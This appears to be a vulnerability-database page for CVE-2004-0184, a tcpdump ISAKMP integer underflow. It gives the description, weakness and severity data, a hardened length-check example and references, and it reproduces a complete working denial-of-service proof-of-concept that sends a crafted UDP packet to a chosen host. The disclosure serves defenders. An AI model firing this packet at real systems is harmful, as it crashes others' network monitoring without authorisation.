CVE-2004-0184 : Detail

CVE-2004-0184

Overflow
65.92%V4
Network
2004-04-06 02h00 +00:00
2017-10-09 22h57 +00:00

CVE Descriptions

Integer underflow in the isakmp_id_print for TCPDUMP 3.8.1 and earlier allows remote attackers to cause a denial of service (crash) via an ISAKMP packet with an Identification payload with a length that becomes less than 8 during byte order conversion, which causes an out-of-bounds read, as demonstrated by the Striker ISAKMP Protocol Test Suite.
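The length handling the description refers to, as an added example (not tcpdump's own code): a model of the unchecked subtraction that wraps when the Identification payload's 16-bit length field is below the 8-byte fixed header, beside a checked version that rejects such a payload, or one that overruns the captured bytes, before any data is read. The constant, function names and the two sample payloads are assumptions constructed for this example.

```c
#include <stdint.h>
#include <stdio.h>

/* Fixed part of an ISAKMP Identification payload (RFC 2408 section 3.8):
 * 4-byte generic payload header (next, reserved, length) followed by
 * the ID type (1 byte) and 3 DOI-specific bytes. */
#define ISAKMP_ID_FIXED_LEN 8

/* The unchecked arithmetic the CVE describes: a payload length smaller
 * than the fixed header wraps to a huge unsigned data length, which a
 * printer then uses to read far past the end of the packet. */
size_t id_data_len_unchecked(uint16_t payload_len)
{
    return (size_t)payload_len - ISAKMP_ID_FIXED_LEN; /* wraps when < 8 */
}

/* Hardened version: returns the number of identification-data bytes that
 * follow the fixed header, or -1 if the payload is malformed. Rejects a
 * truncated capture, a length below the fixed size (the underflow case)
 * and a length that claims more bytes than were captured (the OOB case). */
int id_data_len_checked(const uint8_t *buf, size_t buflen, uint8_t *id_type)
{
    uint16_t payload_len;

    if (buflen < ISAKMP_ID_FIXED_LEN)
        return -1;                                        /* truncated */
    payload_len = (uint16_t)((buf[2] << 8) | buf[3]);     /* network order */
    if (payload_len < ISAKMP_ID_FIXED_LEN)
        return -1;                                        /* would underflow */
    if (payload_len > buflen)
        return -1;                                        /* past the capture */
    if (id_type)
        *id_type = buf[4];
    return payload_len - ISAKMP_ID_FIXED_LEN;
}

/* Constructed inputs: the Identification payload from the proof of concept
 * on this page (length field 5, unknown ID type 0x20) and a well-formed
 * 12-byte payload with ID type 1 (ID_IPV4_ADDR in the IPsec DOI). */
static const uint8_t POC_ID_PAYLOAD[]  = {0x00, 0x00, 0x00, 0x05, 0x20, 0x00, 0x00, 0x00};
static const uint8_t GOOD_ID_PAYLOAD[] = {0x00, 0x00, 0x00, 0x0c, 0x01, 0x00, 0x00, 0x00,
                                          0xc0, 0xa8, 0x01, 0x01};

int main(void)
{
    printf("unchecked, len=5: %zu bytes\n", id_data_len_unchecked(5));
    printf("checked, PoC payload: %d\n",
           id_data_len_checked(POC_ID_PAYLOAD, sizeof POC_ID_PAYLOAD, NULL));
    printf("checked, good payload: %d\n",
           id_data_len_checked(GOOD_ID_PAYLOAD, sizeof GOOD_ID_PAYLOAD, NULL));
    return 0;
}
```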

CVE Information

Related Weaknesses

CWE-ID Weakness Name Source
CWE-125 Out-of-bounds Read
The product reads data past the end, or before the beginning, of the intended buffer.
CWE-191 Integer Underflow (Wrap or Wraparound)
The product subtracts one value from another, such that the result is less than the minimum allowable integer value, which produces a value that is not equal to the correct result.

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 171

Publication date : 2004-04-04 22h00 +00:00
Author : Rapid7
EDB Verified : Yes

/*
 * tcpdump packet sniffer
 * Integer underflow in ISAKMP Identification payload
 * denial of service vulnerability
 * proof of concept code
 * version 1.0 (Apr 02 2004)
 * CVE-ID: CAN-2004-0184
 *
 * by Remi Denis-Courmont < exploit at simphalampin dot com >
 * www simphalempin com dev
 * Remi Denis-Courmont is not responsible for the misuse of the
 * source code provided hereafter.
 *
 * This vulnerability was found by:
 * Rapid7, LLC Security Advisory - www rapid7 com
 * whose original advisory may be fetched from:
 * www rapid7 com advisories R7-0017 html
 *
 * Vulnerable:
 * - tcpdump 3.8.1
 *
 * Not vulnerable:
 * - tcpdump 3.8.3
 *
 * NOTES:
 * The vulnerability cannot be exploited to cause a denial of service
 * with the Debian's tcpdump packages as it was partly fixed as part of
 * the fix for earlier known CAN-2003-0108 vulnerability, though the bug
 * is still present. That may be the case for other vendors which were
 * not investigated.
 *
 * tcpdump must be run with a verbosity level of at least 3:
 * # tcpdump -vvv
 * Otherwise, no denial of service will occur.
 */

#include <string.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netdb.h>

static const char packet[] =
    /* ISAKMP header */
    "\x00\x00\x00\x00\x00\x00\x00\x00" /* Initiator cookie */
    "\x00\x00\x00\x00\x00\x00\x00\x00" /* Responder cookie */
    "\x05"                             /* Next payload: Identification */
    "\x10"                             /* Version: 1.0 */
    "\x01"                             /* Exchange type */
    "\x00"                             /* Flags */
    "\x00\x00\x00\x00"                 /* Message ID */
    "\x00\x00\x00\x24"                 /* Length */
    /* ISAKMP Identification payload */
    "\x00"                             /* Next payload: none */
    "\x00"                             /* Reserved */
    "\x00\x05"                         /* Payload length (incorrect) */
    "\x20"                             /* ID type (unknown) */
    "\x00\x00\x00"                     /* DOI */
    ;

static int send_evil_packet (const struct addrinfo *r)
{
    int fd;
    size_t len;

    fd = socket (r->ai_family, r->ai_socktype, r->ai_protocol);
    if (fd == -1)
    {
        perror ("Socket error");
        return 1;
    }

    len = sizeof (packet) - 1;
    if (sendto (fd, packet, len, 0, r->ai_addr, r->ai_addrlen) != len)
    {
        perror ("Packet sending error");
        close (fd);
        return 1;
    }

    puts ("Packet sent!");
    close (fd);
    return 0;
}

static int proof (const char *hostname)
{
    struct addrinfo *res;
    int check;

    {
        struct addrinfo help;

        memset (&help, 0, sizeof (help));
        help.ai_socktype = SOCK_DGRAM;
        check = getaddrinfo (hostname, "isakmp", &help, &res);
    }

    if (check == 0)
    {
        struct addrinfo *ptr;

        for (ptr = res; ptr != NULL; ptr = ptr->ai_next)
            check |= send_evil_packet (ptr);

        freeaddrinfo (res);
        return check;
    }

    fprintf (stderr, "%s: %s\n", hostname, gai_strerror (check));
    return -1;
}

static void usage (const char *path)
{
    fprintf (stderr, "Usage: %s <hostname/IP>\n", path);
}

int main (int argc, char *argv[])
{
    puts ("tcpdump Integer underflow in ISAKMP Identification payload\n"
          "proof of concept code\n"
          "Copyright (C) Remi Denis-Courmont 2004 "
          "<\x65\x78\x70\x6c\x6f\x69\x74\x40\x73\x69\x6d\x70"
          "\x68\x61\x6c\x65\x6d\x70\x69\x6e\x2e\x63\x6f\x6d>\n");

    if (argc != 2)
    {
        usage (argv[0]);
        return 2;
    }

    return proof (argv[1]) ? 1 : 0;
}

// milw0rm.com [2004-04-05]

Products Mentioned

Configuration 0

Tcpdump >> Tcpdump >> Version To (including) 3.8.1

References

http://www.kb.cert.org/vuls/id/492558
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.redhat.com/support/errata/RHSA-2004-219.html
Tags : vendor-advisory, x_refsource_REDHAT
http://securitytracker.com/id?1009593
Tags : vdb-entry, x_refsource_SECTRACK
http://www.debian.org/security/2004/dsa-478
Tags : vendor-advisory, x_refsource_DEBIAN
http://secunia.com/advisories/11258
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.trustix.org/errata/2004/0015
Tags : vendor-advisory, x_refsource_TRUSTIX
https://bugzilla.fedora.us/show_bug.cgi?id=1468
Tags : vendor-advisory, x_refsource_FEDORA
http://www.securityfocus.com/bid/10004
Tags : vdb-entry, x_refsource_BID
http://marc.info/?l=bugtraq&m=108067265931525&w=2
Tags : mailing-list, x_refsource_BUGTRAQ